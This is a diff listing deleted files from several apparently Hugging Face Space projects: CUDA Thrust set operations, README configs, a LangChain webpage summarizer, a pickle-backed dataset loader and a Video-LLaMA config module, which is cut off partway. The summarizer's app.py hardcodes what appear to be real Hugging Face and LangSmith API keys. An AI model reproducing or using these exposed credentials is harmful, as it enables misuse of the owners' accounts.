1749 |
-
KeysIt1 keys1_first,
|
1750 |
-
KeysIt1 keys1_last,
|
1751 |
-
KeysIt2 keys2_first,
|
1752 |
-
KeysIt2 keys2_last,
|
1753 |
-
ItemsIt1 items1_first,
|
1754 |
-
KeysOutputIt keys_result,
|
1755 |
-
ItemsOutputIt items_result,
|
1756 |
-
CompareOp compare_op)
|
1757 |
-
{
|
1758 |
-
pair<KeysOutputIt, ItemsOutputIt> ret = thrust::make_pair(keys_result, items_result);
|
1759 |
-
if (__THRUST_HAS_CUDART__)
|
1760 |
-
{
|
1761 |
-
ret = __set_operations::set_operations<thrust::detail::true_type>(
|
1762 |
-
policy,
|
1763 |
-
keys1_first,
|
1764 |
-
keys1_last,
|
1765 |
-
keys2_first,
|
1766 |
-
keys2_last,
|
1767 |
-
items1_first,
|
1768 |
-
items1_first,
|
1769 |
-
keys_result,
|
1770 |
-
items_result,
|
1771 |
-
compare_op,
|
1772 |
-
__set_operations::serial_set_intersection());
|
1773 |
-
}
|
1774 |
-
else
|
1775 |
-
{
|
1776 |
-
#if !__THRUST_HAS_CUDART__
|
1777 |
-
ret = thrust::set_intersection_by_key(cvt_to_seq(derived_cast(policy)),
|
1778 |
-
keys1_first,
|
1779 |
-
keys1_last,
|
1780 |
-
keys2_first,
|
1781 |
-
keys2_last,
|
1782 |
-
items1_first,
|
1783 |
-
keys_result,
|
1784 |
-
items_result,
|
1785 |
-
compare_op);
|
1786 |
-
#endif
|
1787 |
-
}
|
1788 |
-
return ret;
|
1789 |
-
}
|
1790 |
-
|
1791 |
-
template <class Derived,
|
1792 |
-
class KeysIt1,
|
1793 |
-
class KeysIt2,
|
1794 |
-
class ItemsIt1,
|
1795 |
-
class ItemsIt2,
|
1796 |
-
class KeysOutputIt,
|
1797 |
-
class ItemsOutputIt>
|
1798 |
-
pair<KeysOutputIt, ItemsOutputIt> __host__ __device__
|
1799 |
-
set_intersection_by_key(execution_policy<Derived> &policy,
|
1800 |
-
KeysIt1 keys1_first,
|
1801 |
-
KeysIt1 keys1_last,
|
1802 |
-
KeysIt2 keys2_first,
|
1803 |
-
KeysIt2 keys2_last,
|
1804 |
-
ItemsIt1 items1_first,
|
1805 |
-
KeysOutputIt keys_result,
|
1806 |
-
ItemsOutputIt items_result)
|
1807 |
-
{
|
1808 |
-
typedef typename thrust::iterator_value<KeysIt1>::type value_type;
|
1809 |
-
return cuda_cub::set_intersection_by_key(policy,
|
1810 |
-
keys1_first,
|
1811 |
-
keys1_last,
|
1812 |
-
keys2_first,
|
1813 |
-
keys2_last,
|
1814 |
-
items1_first,
|
1815 |
-
keys_result,
|
1816 |
-
items_result,
|
1817 |
-
less<value_type>());
|
1818 |
-
}
|
1819 |
-
|
1820 |
-
/*****************************/
|
1821 |
-
|
1822 |
-
__thrust_exec_check_disable__
|
1823 |
-
template <class Derived,
|
1824 |
-
class KeysIt1,
|
1825 |
-
class KeysIt2,
|
1826 |
-
class ItemsIt1,
|
1827 |
-
class ItemsIt2,
|
1828 |
-
class KeysOutputIt,
|
1829 |
-
class ItemsOutputIt,
|
1830 |
-
class CompareOp>
|
1831 |
-
pair<KeysOutputIt, ItemsOutputIt> __host__ __device__
|
1832 |
-
set_symmetric_difference_by_key(execution_policy<Derived> &policy,
|
1833 |
-
KeysIt1 keys1_first,
|
1834 |
-
KeysIt1 keys1_last,
|
1835 |
-
KeysIt2 keys2_first,
|
1836 |
-
KeysIt2 keys2_last,
|
1837 |
-
ItemsIt1 items1_first,
|
1838 |
-
ItemsIt2 items2_first,
|
1839 |
-
KeysOutputIt keys_result,
|
1840 |
-
ItemsOutputIt items_result,
|
1841 |
-
CompareOp compare_op)
|
1842 |
-
{
|
1843 |
-
pair<KeysOutputIt, ItemsOutputIt> ret = thrust::make_pair(keys_result, items_result);
|
1844 |
-
if (__THRUST_HAS_CUDART__)
|
1845 |
-
{
|
1846 |
-
ret = __set_operations::set_operations<thrust::detail::true_type>(
|
1847 |
-
policy,
|
1848 |
-
keys1_first,
|
1849 |
-
keys1_last,
|
1850 |
-
keys2_first,
|
1851 |
-
keys2_last,
|
1852 |
-
items1_first,
|
1853 |
-
items2_first,
|
1854 |
-
keys_result,
|
1855 |
-
items_result,
|
1856 |
-
compare_op,
|
1857 |
-
__set_operations::serial_set_symmetric_difference());
|
1858 |
-
}
|
1859 |
-
else
|
1860 |
-
{
|
1861 |
-
#if !__THRUST_HAS_CUDART__
|
1862 |
-
ret = thrust::set_symmetric_difference_by_key(cvt_to_seq(derived_cast(policy)),
|
1863 |
-
keys1_first,
|
1864 |
-
keys1_last,
|
1865 |
-
keys2_first,
|
1866 |
-
keys2_last,
|
1867 |
-
items1_first,
|
1868 |
-
items2_first,
|
1869 |
-
keys_result,
|
1870 |
-
items_result,
|
1871 |
-
compare_op);
|
1872 |
-
#endif
|
1873 |
-
}
|
1874 |
-
return ret;
|
1875 |
-
}
|
1876 |
-
|
1877 |
-
template <class Derived,
|
1878 |
-
class KeysIt1,
|
1879 |
-
class KeysIt2,
|
1880 |
-
class ItemsIt1,
|
1881 |
-
class ItemsIt2,
|
1882 |
-
class KeysOutputIt,
|
1883 |
-
class ItemsOutputIt>
|
1884 |
-
pair<KeysOutputIt, ItemsOutputIt> __host__ __device__
|
1885 |
-
set_symmetric_difference_by_key(execution_policy<Derived> &policy,
|
1886 |
-
KeysIt1 keys1_first,
|
1887 |
-
KeysIt1 keys1_last,
|
1888 |
-
KeysIt2 keys2_first,
|
1889 |
-
KeysIt2 keys2_last,
|
1890 |
-
ItemsIt1 items1_first,
|
1891 |
-
ItemsIt2 items2_first,
|
1892 |
-
KeysOutputIt keys_result,
|
1893 |
-
ItemsOutputIt items_result)
|
1894 |
-
{
|
1895 |
-
typedef typename thrust::iterator_value<KeysIt1>::type value_type;
|
1896 |
-
-  return cuda_cub::set_symmetric_difference_by_key(policy,
-                                                   keys1_first,
-                                                   keys1_last,
-                                                   keys2_first,
-                                                   keys2_last,
-                                                   items1_first,
-                                                   items2_first,
-                                                   keys_result,
-                                                   items_result,
-                                                   less<value_type>());
-}
-
-/*****************************/
-
-__thrust_exec_check_disable__
-template <class Derived,
-          class KeysIt1,
-          class KeysIt2,
-          class ItemsIt1,
-          class ItemsIt2,
-          class KeysOutputIt,
-          class ItemsOutputIt,
-          class CompareOp>
-pair<KeysOutputIt, ItemsOutputIt> __host__ __device__
-set_union_by_key(execution_policy<Derived> &policy,
-                 KeysIt1 keys1_first,
-                 KeysIt1 keys1_last,
-                 KeysIt2 keys2_first,
-                 KeysIt2 keys2_last,
-                 ItemsIt1 items1_first,
-                 ItemsIt2 items2_first,
-                 KeysOutputIt keys_result,
-                 ItemsOutputIt items_result,
-                 CompareOp compare_op)
-{
-  pair<KeysOutputIt, ItemsOutputIt> ret = thrust::make_pair(keys_result, items_result);
-  if (__THRUST_HAS_CUDART__)
-  {
-    ret = __set_operations::set_operations<thrust::detail::true_type>(
-        policy,
-        keys1_first,
-        keys1_last,
-        keys2_first,
-        keys2_last,
-        items1_first,
-        items2_first,
-        keys_result,
-        items_result,
-        compare_op,
-        __set_operations::serial_set_union());
-  }
-  else
-  {
-#if !__THRUST_HAS_CUDART__
-    ret = thrust::set_union_by_key(cvt_to_seq(derived_cast(policy)),
-                                   keys1_first,
-                                   keys1_last,
-                                   keys2_first,
-                                   keys2_last,
-                                   items1_first,
-                                   items2_first,
-                                   keys_result,
-                                   items_result,
-                                   compare_op);
-#endif
-  }
-  return ret;
-}
-
-template <class Derived,
-          class KeysIt1,
-          class KeysIt2,
-          class ItemsIt1,
-          class ItemsIt2,
-          class KeysOutputIt,
-          class ItemsOutputIt>
-pair<KeysOutputIt, ItemsOutputIt> __host__ __device__
-set_union_by_key(execution_policy<Derived> &policy,
-                 KeysIt1 keys1_first,
-                 KeysIt1 keys1_last,
-                 KeysIt2 keys2_first,
-                 KeysIt2 keys2_last,
-                 ItemsIt1 items1_first,
-                 ItemsIt2 items2_first,
-                 KeysOutputIt keys_result,
-                 ItemsOutputIt items_result)
-{
-  typedef typename thrust::iterator_value<KeysIt1>::type value_type;
-  return cuda_cub::set_union_by_key(policy,
-                                    keys1_first,
-                                    keys1_last,
-                                    keys2_first,
-                                    keys2_last,
-                                    items1_first,
-                                    items2_first,
-                                    keys_result,
-                                    items_result,
-                                    less<value_type>());
-}
-
-}    // namespace cuda_cub
-} // end namespace thrust
-#endif
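The deleted Thrust code dispatches `set_union_by_key` to a CUDA implementation, but the operation it computes is the classic serial merge. A minimal Python sketch of that merge (names are illustrative; as in `std::set_union`, entries from the first range win on equivalent keys):

```python
def set_union_by_key(keys1, items1, keys2, items2, compare=lambda a, b: a < b):
    """Serial sketch of set_union_by_key over two key-sorted ranges.

    Produces the union of the key ranges; for keys present in both
    ranges, the (key, item) pair from range 1 is kept.
    """
    keys_out, items_out = [], []
    i = j = 0
    while i < len(keys1) and j < len(keys2):
        if compare(keys1[i], keys2[j]):      # key1 < key2: take from range 1
            keys_out.append(keys1[i]); items_out.append(items1[i]); i += 1
        elif compare(keys2[j], keys1[i]):    # key2 < key1: take from range 2
            keys_out.append(keys2[j]); items_out.append(items2[j]); j += 1
        else:                                # equivalent keys: range 1 wins
            keys_out.append(keys1[i]); items_out.append(items1[i]); i += 1; j += 1
    # One range is exhausted; append the tail of the other.
    keys_out += keys1[i:]; items_out += items1[i:]
    keys_out += keys2[j:]; items_out += items2[j:]
    return keys_out, items_out
```

The CUDA version parallelizes exactly this loop by partitioning both sorted ranges; the default overload in the diff simply fills in `less<value_type>()` as `compare`.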
spaces/CVPR/monoscene_lite/README.md
DELETED
@@ -1,13 +0,0 @@
----
-title: MonoScene lite
-emoji: 🚘🏙️
-colorFrom: purple
-colorTo: pink
-sdk: gradio
-sdk_version: 3.0.20
-app_file: app.py
-pinned: true
-license: apache-2.0
----
-
-Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
spaces/CazimirRoman/summarize-your-webpage-api-with-gradio/app.py
DELETED
@@ -1,35 +0,0 @@
-import gradio
-import os
-
-from langchain.chains.question_answering import load_qa_chain
-from langchain.document_loaders import UnstructuredURLLoader
-from langchain import HuggingFaceHub
-
-os.environ["HUGGINGFACEHUB_API_TOKEN"] = "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"
-
-llm = HuggingFaceHub(repo_id="declare-lab/flan-alpaca-large", model_kwargs={"temperature":0.1, "max_length":512})
-
-os.environ["LANGCHAIN_TRACING_V2"] = "true"
-os.environ["LANGCHAIN_ENDPOINT"] = "https://api.smith.langchain.com"
-os.environ["LANGCHAIN_API_KEY"] = "ls__ae9b316f4ee9475b84f66c616344d713"
-os.environ["LANGCHAIN_PROJECT"] = "Sequential-Chain"
-
-def main():
-
-    gradio_interface = gradio.Interface(
-        fn = my_inference_function,
-        inputs = "text",
-        outputs = "text")
-
-    gradio_interface.launch()
-
-
-def my_inference_function(url):
-    loader = UnstructuredURLLoader(urls=[url])
-    data = loader.load()
-    chain = load_qa_chain(llm=llm, chain_type="stuff")
-    response = chain.run(input_documents=data, question="Summarize this article in one paragraph")
-    return response
-
-if __name__ == '__main__':
-    main()
spaces/Chatop/Lab10/README.md
DELETED
@@ -1,13 +0,0 @@
----
-title: Lab10
-emoji: 📊
-colorFrom: red
-colorTo: red
-sdk: streamlit
-sdk_version: 1.10.0
-app_file: app.py
-pinned: false
-license: cc-by-4.0
----
-
-Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
spaces/ChrisPreston/diff-svc_minato_aqua/utils/indexed_datasets.py
DELETED
@@ -1,73 +0,0 @@
-import pickle
-from copy import deepcopy
-
-import numpy as np
-
-
-class IndexedDataset:
-    def __init__(self, path, num_cache=1):
-        super().__init__()
-        self.path = path
-        self.data_file = None
-        self.data_offsets = np.load(f"{path}.idx", allow_pickle=True).item()['offsets']
-        self.data_file = open(f"{path}.data", 'rb', buffering=-1)
-        self.cache = []
-        self.num_cache = num_cache
-
-    def check_index(self, i):
-        if i < 0 or i >= len(self.data_offsets) - 1:
-            raise IndexError('index out of range')
-
-    def __del__(self):
-        if self.data_file:
-            self.data_file.close()
-
-    def __getitem__(self, i):
-        self.check_index(i)
-        if self.num_cache > 0:
-            for c in self.cache:
-                if c[0] == i:
-                    return c[1]
-        self.data_file.seek(self.data_offsets[i])
-        b = self.data_file.read(self.data_offsets[i + 1] - self.data_offsets[i])
-        item = pickle.loads(b)
-        if self.num_cache > 0:
-            self.cache = [(i, deepcopy(item))] + self.cache[:-1]
-        return item
-
-    def __len__(self):
-        return len(self.data_offsets) - 1
-
-
-class IndexedDatasetBuilder:
-    def __init__(self, path):
-        self.path = path
-        self.out_file = open(f"{path}.data", 'wb')
-        self.byte_offsets = [0]
-
-    def add_item(self, item):
-        s = pickle.dumps(item)
-        bytes = self.out_file.write(s)
-        self.byte_offsets.append(self.byte_offsets[-1] + bytes)
-
-    def finalize(self):
-        self.out_file.close()
-        np.save(open(f"{self.path}.idx", 'wb'), {'offsets': self.byte_offsets})
-
-
-if __name__ == "__main__":
-    import random
-    from tqdm import tqdm
-
-    ds_path = '/tmp/indexed_ds_example'
-    size = 100
-    items = [{"a": np.random.normal(size=[10000, 10]),
-              "b": np.random.normal(size=[10000, 10])} for i in range(size)]
-    builder = IndexedDatasetBuilder(ds_path)
-    for i in tqdm(range(size)):
-        builder.add_item(items[i])
-    builder.finalize()
-    ds = IndexedDataset(ds_path)
-    for i in tqdm(range(10000)):
-        idx = random.randint(0, size - 1)
-        assert (ds[idx]['a'] == items[idx]['a']).all()
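The deleted `indexed_datasets.py` implements an offset-index record store: pickled records are written back-to-back into a `.data` file, and the byte offset of each record boundary is saved as the index, so any record can be read with one seek. A dependency-free sketch of that layout (function names are illustrative, not from the original):

```python
import os
import pickle
import tempfile

def write_records(path, records):
    """Pickle records back-to-back into one file; return boundary offsets.

    offsets[i] is where record i starts, offsets[i + 1] where it ends,
    so len(offsets) == len(records) + 1.
    """
    offsets = [0]
    with open(path, "wb") as f:
        for rec in records:
            f.write(pickle.dumps(rec))
            offsets.append(f.tell())
    return offsets

def read_record(path, offsets, i):
    """Random-access read of record i: seek to its start, read its span."""
    with open(path, "rb") as f:
        f.seek(offsets[i])
        return pickle.loads(f.read(offsets[i + 1] - offsets[i]))
```

The original classes add a small LRU-style cache and persist the offsets via `np.save`, but the seek-and-slice access pattern is the same.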
spaces/ClearLove443/Robby-chatbot/modules/layout.py
DELETED
@@ -1,44 +0,0 @@
-import streamlit as st
-
-class Layout:
-
-    def show_header(self, types_files):
-        """
-        Displays the header of the app
-        """
-        st.markdown(
-            f"""
-            <h1 style='text-align: center;'> Ask Robby about your {types_files} files ! 😁</h1>
-            """,
-            unsafe_allow_html=True,
-        )
-
-    def show_api_key_missing(self):
-        """
-        Displays a message if the user has not entered an API key
-        """
-        st.markdown(
-            """
-            <div style='text-align: center;'>
-                <h4>Enter your <a href="https://platform.openai.com/account/api-keys" target="_blank">OpenAI API key</a> to start chatting</h4>
-            </div>
-            """,
-            unsafe_allow_html=True,
-        )
-
-    def prompt_form(self):
-        """
-        Displays the prompt form
-        """
-        with st.form(key="my_form", clear_on_submit=True):
-            user_input = st.text_area(
-                "Query:",
-                placeholder="Ask me anything about the document...",
-                key="input",
-                label_visibility="collapsed",
-            )
-            submit_button = st.form_submit_button(label="Send")
-
-            is_ready = submit_button and user_input
-        return is_ready, user_input
-
spaces/CognitiveLabs/Research-Assistant/processing/text.py
DELETED
@@ -1,18 +0,0 @@
-"""Text processing functions"""
-from typing import Dict, Generator
-
-from config import Config
-import os
-
-CFG = Config()
-
-
-def read_txt_files(directory):
-    all_text = ''
-
-    for filename in os.listdir(directory):
-        if filename.endswith('.txt'):
-            with open(os.path.join(directory, filename), 'r') as file:
-                all_text += file.read() + '\n'
-
-    return all_text
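The `read_txt_files` helper above concatenates every `.txt` file in a directory, appending a newline after each. A standalone sketch of the same logic, runnable without the module's `Config` dependency (the `sorted()` call is an addition here, only to make the concatenation order deterministic; the original iterates `os.listdir()` in arbitrary order):

```python
import os
import tempfile

def read_txt_files(directory):
    """Concatenate all .txt files in directory, one '\n' after each."""
    all_text = ''
    for filename in sorted(os.listdir(directory)):  # sorted for determinism
        if filename.endswith('.txt'):
            with open(os.path.join(directory, filename), 'r') as file:
                all_text += file.read() + '\n'
    return all_text

# Build a tiny corpus to run the helper against; non-.txt files are skipped.
corpus = tempfile.mkdtemp()
for name, body in [("a.txt", "alpha"), ("b.txt", "beta"), ("skip.md", "ignored")]:
    with open(os.path.join(corpus, name), "w") as f:
        f.write(body)
```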
spaces/DAMO-NLP-SG/Video-LLaMA/video_llama/common/config.py
DELETED
@@ -1,468 +0,0 @@
|
|
1 |
-
"""
|
2 |
-
Copyright (c) 2022, salesforce.com, inc.
|
3 |
-
All rights reserved.
|
4 |
-
SPDX-License-Identifier: BSD-3-Clause
|
5 |
-
For full license text, see the LICENSE_Lavis file in the repo root or https://opensource.org/licenses/BSD-3-Clause
|
6 |
-
"""
|
7 |
-
|
8 |
-
import logging
|
9 |
-
import json
|
10 |
-
from typing import Dict
|
11 |
-
|
12 |
-
from omegaconf import OmegaConf
|
13 |
-
from video_llama.common.registry import registry
|
14 |
-
|
15 |
-
|
16 |
-
class Config:
|
17 |
-
def __init__(self, args):
|
18 |
-
self.config = {}
|
19 |
-
|
20 |
-
self.args = args
|
21 |
-
|
22 |
-
# Register the config and configuration for setup
|
23 |
-
registry.register("configuration", self)
|
24 |
-
|
25 |
-
user_config = self._build_opt_list(self.args.options)
|
26 |
-
|
27 |
-
config = OmegaConf.load(self.args.cfg_path)
|
28 |
-
|
29 |
-
runner_config = self.build_runner_config(config)
|
30 |
-
model_config = self.build_model_config(config, **user_config)
|
31 |
-
dataset_config = self.build_dataset_config(config)
|
32 |
-
|
33 |
-
# Validate the user-provided runner configuration
|
34 |
-
# model and dataset configuration are supposed to be validated by the respective classes
|
35 |
-
# [TODO] validate the model/dataset configuration
|
36 |
-
# self._validate_runner_config(runner_config)
|
37 |
-
|
38 |
-
# Override the default configuration with user options.
|
39 |
-
self.config = OmegaConf.merge(
|
40 |
-
runner_config, model_config, dataset_config, user_config
|
41 |
-
)
|
42 |
-
|
43 |
-
def _validate_runner_config(self, runner_config):
|
44 |
-
"""
|
45 |
-
This method validates the configuration, such that
|
46 |
-
1) all the user specified options are valid;
|
47 |
-
2) no type mismatches between the user specified options and the config.
|
48 |
-
"""
|
49 |
-
runner_config_validator = create_runner_config_validator()
|
50 |
-
runner_config_validator.validate(runner_config)
|
51 |
-
|
52 |
-
def _build_opt_list(self, opts):
|
53 |
-
opts_dot_list = self._convert_to_dot_list(opts)
|
54 |
-
return OmegaConf.from_dotlist(opts_dot_list)
|
55 |
-
|
56 |
-
@staticmethod
|
57 |
-
def build_model_config(config, **kwargs):
|
58 |
-
model = config.get("model", None)
|
59 |
-
assert model is not None, "Missing model configuration file."
|
60 |
-
|
61 |
-
model_cls = registry.get_model_class(model.arch)
|
62 |
-
assert model_cls is not None, f"Model '{model.arch}' has not been registered."
|
63 |
-
|
64 |
-
model_type = kwargs.get("model.model_type", None)
|
65 |
-
if not model_type:
|
66 |
-
model_type = model.get("model_type", None)
|
67 |
-
# else use the model type selected by user.
|
68 |
-
|
69 |
-
assert model_type is not None, "Missing model_type."
|
70 |
-
|
71 |
-
model_config_path = model_cls.default_config_path(model_type=model_type)
|
72 |
-
|
73 |
-
model_config = OmegaConf.create()
|
74 |
-
# hierarchy override, customized config > default config
|
75 |
-
model_config = OmegaConf.merge(
|
76 |
-
model_config,
|
77 |
-
OmegaConf.load(model_config_path),
|
78 |
-
{"model": config["model"]},
|
79 |
-
)
|
80 |
-
|
81 |
-
return model_config
|
82 |
-
|
83 |
-
@staticmethod
|
84 |
-
def build_runner_config(config):
|
85 |
-
return {"run": config.run}
|
86 |
-
|
87 |
-
@staticmethod
|
88 |
-
def build_dataset_config(config):
|
89 |
-
datasets = config.get("datasets", None)
|
90 |
-
if datasets is None:
|
91 |
-
raise KeyError(
|
92 |
-
"Expecting 'datasets' as the root key for dataset configuration."
|
93 |
-
)
|
94 |
-
|
95 |
-
dataset_config = OmegaConf.create()
|
96 |
-
|
97 |
-
for dataset_name in datasets:
|
98 |
-
builder_cls = registry.get_builder_class(dataset_name)
|
99 |
-
|
100 |
-
dataset_config_type = datasets[dataset_name].get("type", "default")
|
101 |
-
dataset_config_path = builder_cls.default_config_path(
|
102 |
-
type=dataset_config_type
|
103 |
-
)
|
104 |
-
|
105 |
-
# hierarchy override, customized config > default config
|
106 |
-
dataset_config = OmegaConf.merge(
|
107 |
-
dataset_config,
|
108 |
-
OmegaConf.load(dataset_config_path),
|
109 |
-
{"datasets": {dataset_name: config["datasets"][dataset_name]}},
|
110 |
-
)
|
111 |
-
|
112 |
-
return dataset_config
|
113 |
-
|
114 |
-
def _convert_to_dot_list(self, opts):
|
115 |
-
if opts is None:
|
116 |
-
opts = []
|
117 |
-
|
118 |
-
if len(opts) == 0:
|
119 |
-
return opts
|
120 |
-
|
121 |
-
has_equal = opts[0].find("=") != -1
|
122 |
-
|
123 |
-
if has_equal:
|
124 |
-
return opts
|
125 |
-
|
126 |
-
return [(opt + "=" + value) for opt, value in zip(opts[0::2], opts[1::2])]
|
127 |
-
|
128 |
-
def get_config(self):
|
129 |
-
return self.config
|
130 |
-
|
131 |
-
@property
|
132 |
-
def run_cfg(self):
|
133 |
-
return self.config.run
|
134 |
-
|
135 |
-
@property
|
136 |
-
def datasets_cfg(self):
|
137 |
-
return self.config.datasets
|
138 |
-
|
139 |
-
@property
|
140 |
-
def model_cfg(self):
|
141 |
-
return self.config.model
|
142 |
-
|
143 |
-
def pretty_print(self):
|
144 |
-
logging.info("\n===== Running Parameters =====")
|
145 |
-
logging.info(self._convert_node_to_json(self.config.run))
|
146 |
-
|
147 |
-
logging.info("\n====== Dataset Attributes ======")
|
148 |
-
datasets = self.config.datasets
|
149 |
-
|
150 |
-
for dataset in datasets:
|
151 |
-
if dataset in self.config.datasets:
|
152 |
-
logging.info(f"\n======== {dataset} =======")
|
153 |
-
dataset_config = self.config.datasets[dataset]
|
154 |
-
logging.info(self._convert_node_to_json(dataset_config))
|
155 |
-
else:
|
156 |
-
logging.warning(f"No dataset named '{dataset}' in config. Skipping")
|
157 |
-
|
158 |
-
logging.info(f"\n====== Model Attributes ======")
|
159 |
-
logging.info(self._convert_node_to_json(self.config.model))
|
160 |
-
|
161 |
-
def _convert_node_to_json(self, node):
|
162 |
-
container = OmegaConf.to_container(node, resolve=True)
|
163 |
-
return json.dumps(container, indent=4, sort_keys=True)
|
164 |
-
|
165 |
-
def to_dict(self):
|
166 |
-
return OmegaConf.to_container(self.config)
|
167 |
-
|
168 |
-
|
169 |
-
def node_to_dict(node):
|
170 |
-
return OmegaConf.to_container(node)
|
171 |
-
|
172 |
-
|
173 |
-
class ConfigValidator:
|
174 |
-
"""
|
175 |
-
This is a preliminary implementation to centralize and validate the configuration.
|
176 |
-
May be altered in the future.
|
177 |
-
|
178 |
-
A helper class to validate configurations from yaml file.
|
179 |
-
|
180 |
-
This serves the following purposes:
|
181 |
-
1. Ensure all the options in the yaml are defined, raise error if not.
|
182 |
-
2. when type mismatches are found, the validator will raise an error.
|
183 |
-
3. a central place to store and display helpful messages for supported configurations.
|
184 |
-
|
185 |
-
"""
|
186 |
-
|
187 |
-
class _Argument:
|
188 |
-
def __init__(self, name, choices=None, type=None, help=None):
|
189 |
-
self.name = name
|
190 |
-
self.val = None
|
191 |
-
self.choices = choices
|
192 |
-
self.type = type
|
193 |
-
self.help = help
|
194 |
-
|
195 |
-
def __str__(self):
|
196 |
-
s = f"{self.name}={self.val}"
|
197 |
-
if self.type is not None:
|
198 |
-
s += f", ({self.type})"
|
199 |
-
if self.choices is not None:
|
200 |
-
s += f", choices: {self.choices}"
|
201 |
-
if self.help is not None:
|
202 |
-
s += f", ({self.help})"
|
203 |
-
return s
|
204 |
-
|
205 |
-
def __init__(self, description):
|
206 |
-
self.description = description
|
207 |
-
|
208 |
-
self.arguments = dict()
|
209 |
-
|
210 |
-
self.parsed_args = None
|
211 |
-
|
212 |
-
def __getitem__(self, key):
|
213 |
-
assert self.parsed_args is not None, "No arguments parsed yet."
|
214 |
-
|
215 |
-
return self.parsed_args[key]
|
216 |
-
|
217 |
-
def __str__(self) -> str:
|
218 |
-
return self.format_help()
|
219 |
-
|
220 |
-
def add_argument(self, *args, **kwargs):
|
221 |
-
"""
|
222 |
-
Assume the first argument is the name of the argument.
|
223 |
-
"""
|
224 |
-
self.arguments[args[0]] = self._Argument(*args, **kwargs)
|
225 |
-
|
226 |
-
def validate(self, config=None):
|
227 |
-
"""
|
228 |
-
Convert yaml config (dict-like) to list, required by argparse.
|
229 |
-
"""
|
230 |
-
for k, v in config.items():
|
231 |
-
assert (
|
232 |
-
k in self.arguments
|
233 |
-
), f"""{k} is not a valid argument. Support arguments are {self.format_arguments()}."""
|
234 |
-
|
235 |
-
if self.arguments[k].type is not None:
|
236 |
-
try:
|
237 |
-
self.arguments[k].val = self.arguments[k].type(v)
|
238 |
-
except ValueError:
|
239 |
-
raise ValueError(f"{k} is not a valid {self.arguments[k].type}.")
|
240 |
-
|
241 |
-
if self.arguments[k].choices is not None:
|
242 |
-
assert (
|
243 |
-
v in self.arguments[k].choices
|
244 |
-
), f"""{k} must be one of {self.arguments[k].choices}."""
|
245 |
-
|
246 |
-
return config
|
247 |
-
|
248 |
-
def format_arguments(self):
|
249 |
-
return str([f"{k}" for k in sorted(self.arguments.keys())])
|
250 |
-
|
251 |
-
def format_help(self):
|
252 |
-
# description + key-value pair string for each argument
|
253 |
-
help_msg = str(self.description)
|
254 |
-
return help_msg + ", available arguments: " + self.format_arguments()
|
255 |
-
|
256 |
-
def print_help(self):
|
257 |
-
# display help message
|
258 |
-
print(self.format_help())
|
259 |
-
|
260 |
-
|
261 |
-
def create_runner_config_validator():
|
262 |
-
validator = ConfigValidator(description="Runner configurations")
|
263 |
-
|
264 |
-
validator.add_argument(
|
265 |
-
"runner",
|
266 |
-
type=str,
|
267 |
-
choices=["runner_base", "runner_iter"],
|
268 |
-
help="""Runner to use. The "runner_base" uses epoch-based training while iter-based
|
269 |
-
runner runs based on iters. Default: runner_base""",
|
270 |
-
)
|
271 |
-
# add argumetns for training dataset ratios
|
272 |
-
validator.add_argument(
|
273 |
-
"train_dataset_ratios",
|
274 |
-
type=Dict[str, float],
|
275 |
-
help="""Ratios of training dataset. This is used in iteration-based runner.
|
276 |
-
Do not support for epoch-based runner because how to define an epoch becomes tricky.
|
277 |
-
Default: None""",
|
278 |
-
)
|
279 |
-
validator.add_argument(
|
280 |
-
"max_iters",
|
281 |
-
type=float,
|
282 |
-
help="Maximum number of iterations to run.",
|
283 |
-
)
|
284 |
-
validator.add_argument(
|
285 |
-
"max_epoch",
|
286 |
-
type=int,
|
287 |
-
help="Maximum number of epochs to run.",
|
288 |
-
)
|
289 |
-
# add arguments for iters_per_inner_epoch
|
290 |
-
validator.add_argument(
|
291 |
-
"iters_per_inner_epoch",
|
292 |
-
type=float,
|
293 |
-
help="Number of iterations per inner epoch. This is required when runner is runner_iter.",
|
294 |
-
)
|
295 |
-
lr_scheds_choices = registry.list_lr_schedulers()
|
296 |
-
validator.add_argument(
|
297 |
-
"lr_sched",
|
298 |
-
type=str,
|
299 |
-
choices=lr_scheds_choices,
|
300 |
-
help="Learning rate scheduler to use, from {}".format(lr_scheds_choices),
|
301 |
-
)
|
302 |
-
task_choices = registry.list_tasks()
|
303 |
-
validator.add_argument(
|
304 |
-
"task",
|
305 |
-
type=str,
|
306 |
-
choices=task_choices,
|
307 |
-
help="Task to use, from {}".format(task_choices),
|
308 |
-
)
|
309 |
-
# add arguments for init_lr
|
310 |
-
validator.add_argument(
|
311 |
-
"init_lr",
|
312 |
-
type=float,
|
313 |
-
help="Initial learning rate. This will be the learning rate after warmup and before decay.",
|
314 |
-
)
|
315 |
-
# add arguments for min_lr
|
316 |
-
validator.add_argument(
|
317 |
-
"min_lr",
|
318 |
-
type=float,
|
319 |
-
help="Minimum learning rate (after decay).",
|
320 |
-
)
|
321 |
-
# add arguments for warmup_lr
|
322 |
-
validator.add_argument(
|
323 |
-
"warmup_lr",
|
324 |
-
type=float,
|
325 |
-
help="Starting learning rate for warmup.",
|
326 |
-
)
|
327 |
-
# add arguments for learning rate decay rate
|
328 |
-
validator.add_argument(
|
329 |
-
"lr_decay_rate",
|
330 |
-
type=float,
|
331 |
-
help="Learning rate decay rate. Required if using a decaying learning rate scheduler.",
|
332 |
-
)
|
333 |
-
# add arguments for weight decay
|
334 |
-
validator.add_argument(
|
335 |
-
"weight_decay",
|
336 |
-
type=float,
|
337 |
-
help="Weight decay rate.",
|
338 |
-
)
|
339 |
-
# add arguments for training batch size
|
340 |
-
validator.add_argument(
|
341 |
-
"batch_size_train",
|
342 |
-
type=int,
|
343 |
-
help="Training batch size.",
|
344 |
-
)
|
345 |
-
# add arguments for evaluation batch size
|
346 |
-
validator.add_argument(
|
347 |
-
"batch_size_eval",
|
348 |
-
type=int,
|
349 |
-
help="Evaluation batch size, including validation and testing.",
|
350 |
-
)
|
351 |
-
# add arguments for number of workers for data loading
|
352 |
-
validator.add_argument(
|
353 |
-
"num_workers",
|
354 |
-
help="Number of workers for data loading.",
|
355 |
-
)
|
356 |
-
# add arguments for warm up steps
|
357 |
-
validator.add_argument(
|
358 |
-
"warmup_steps",
|
359 |
-
type=int,
|
360 |
-
help="Number of warmup steps. Required if a warmup schedule is used.",
|
361 |
-
)
|
362 |
-
# add arguments for random seed
|
363 |
-
validator.add_argument(
|
364 |
-
"seed",
|
365 |
-
type=int,
|
366 |
-
help="Random seed.",
|
367 |
-
)
|
368 |
-
# add arguments for output directory
|
369 |
-
validator.add_argument(
|
370 |
-
"output_dir",
|
